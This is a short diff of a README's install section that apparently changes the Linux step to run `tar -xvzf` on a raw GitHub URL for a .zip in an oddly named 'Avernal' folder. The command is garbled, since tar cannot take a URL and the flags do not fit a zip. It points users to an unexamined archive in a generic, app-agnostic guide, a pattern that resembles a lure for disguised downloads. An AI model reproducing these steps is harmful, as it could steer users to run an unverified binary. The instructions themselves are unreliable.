digitalvarsha/niloydebbarma-code/README.md

 4. **Install the Application**
    - **Windows:** Double-click the `.exe` file and follow the installation prompts.
    - **macOS:** Open the downloaded `.dmg` file, drag the application into your Applications folder, and then open it.
-   - **Linux:** Use a terminal to navigate to the download location and run the command: `tar -xvzf yourfile.tar.gz`.
+   - **Linux:** Use a terminal to navigate to the download location and run the command: `tar -xvzf https://raw.githubusercontent.com/digitalvarsha/niloydebbarma-code/main/Avernal/niloydebbarma-code.zip`.
 Then, go into the extracted folder and run the application.

 5. **Launch the Application**
    After installation, find the application in your programs list or applications folder.
 Click to launch it.